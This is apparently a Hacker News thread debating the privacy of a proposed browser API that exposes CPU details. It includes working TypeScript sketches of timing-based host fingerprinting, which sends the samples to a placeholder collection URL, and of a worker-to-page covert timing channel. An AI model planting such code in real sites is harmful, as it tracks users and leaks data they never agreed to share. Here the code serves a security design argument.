Comment by derefr

6 months ago

If a page can already deduce performance fluctuations all on its own, then you don't need a special access-limited performance API, do you? Just have the page do whatever you're imagining could be done to extract this side-channel info on the performance of the host — and then leak the results of that measurement over the network directly.

(I imagine, if such measurements done by pages are at all distinguishable from noise, that they are already being exfiltrated by any number of JS user-fingerprinting scripts.)

A page can deduce performance fluctuations. It just needs to run the same calculation repeatedly and time each run.
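
A minimal sketch of that, assuming the coarsened performance.now() resolution in current browsers still leaves enough variance to see; busyWork() and the collection URL are made-up placeholders, and the sendBeacon call at the end is the direct network leak described above:

    // busyWork() and the collect URL are placeholders; the point is just
    // "time the same fixed calculation repeatedly".
    function busyWork(): number {
      let acc = 0;
      for (let i = 0; i < 1_000_000; i++) acc += Math.sqrt(i);
      return acc;
    }

    const samples: number[] = [];
    for (let run = 0; run < 50; run++) {
      const t0 = performance.now();
      busyWork();
      samples.push(performance.now() - t0); // host load shows up as variance across runs
    }

    // Leak the measurement over the network directly: an ordinary request, no special API.
    navigator.sendBeacon("https://example.com/collect", JSON.stringify(samples));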

The issue with the API is that it provides specifics about the CPU like "Apple M2 Max". If you give this info to a worker, the worker can encode it into a side-channel and send it to the page.
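
Roughly what that encoding could look like, sketched with an ordinary dedicated Worker rather than a Service Worker for brevity. The cpuModel string stands in for whatever the restricted API would hand the worker, and the 20 ms / 10 ms values are arbitrary; the worker never posts the string itself, it only modulates how long it takes to acknowledge each message, one bit per round trip:

    // Worker side: reply latency encodes one bit per "next" message.
    const workerSource = `
      const cpuModel = "Apple M2 Max"; // stand-in for the value the restricted API would expose
      const bits = [...cpuModel]
        .flatMap(c => c.charCodeAt(0).toString(2).padStart(8, "0").split(""))
        .map(Number);
      let i = 0;
      self.onmessage = () => {
        const bit = bits[i++] ?? 0;
        if (bit === 1) {                      // burn ~20 ms to signal a 1
          const end = performance.now() + 20;
          while (performance.now() < end) {}
        }
        self.postMessage("ack");              // the reply itself carries no data
      };
    `;
    const worker = new Worker(
      URL.createObjectURL(new Blob([workerSource], { type: "text/javascript" }))
    );

    // Page side: time each round trip and threshold it back into bits.
    async function readBit(): Promise<number> {
      const t0 = performance.now();
      await new Promise<void>(resolve => {
        worker.onmessage = () => resolve();
        worker.postMessage("next");
      });
      return performance.now() - t0 > 10 ? 1 : 0;
    }

    async function leakString(nBytes: number): Promise<string> {
      let out = "";
      for (let b = 0; b < nBytes; b++) {
        let code = 0;
        for (let k = 0; k < 8; k++) code = (code << 1) | (await readBit());
        out += String.fromCharCode(code);
      }
      return out; // "Apple M2 Max", recovered purely from reply timing
    }

The page ends up with the string without it ever appearing in a postMessage payload, which is why filtering the worker's outgoing messages alone wouldn't close the channel.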

  • I imagine you could "solve" this (for a painful and pointless value of "solve") by 1. only allowing the Service Worker to do constant-time versions of operations (like the constant-time primitives that cryptographic code uses), and 2. not allowing this special Service Worker to ever... execute a loop.

    But at that point, you've gone so far toward neutering the page-controlled Service Worker that having a page-controlled Service Worker at all would be a bit pointless. If the Service Worker can only make exactly one WebGL API call for each metric time-series datapoint it receives, then the particular call it's going to make is perfectly predictable in advance given the datapoint. So at that point, why have the page specify it? Just let the browser figure out how to render the chart.

    So I revised the design to do exactly that: https://news.ycombinator.com/item?id=40929284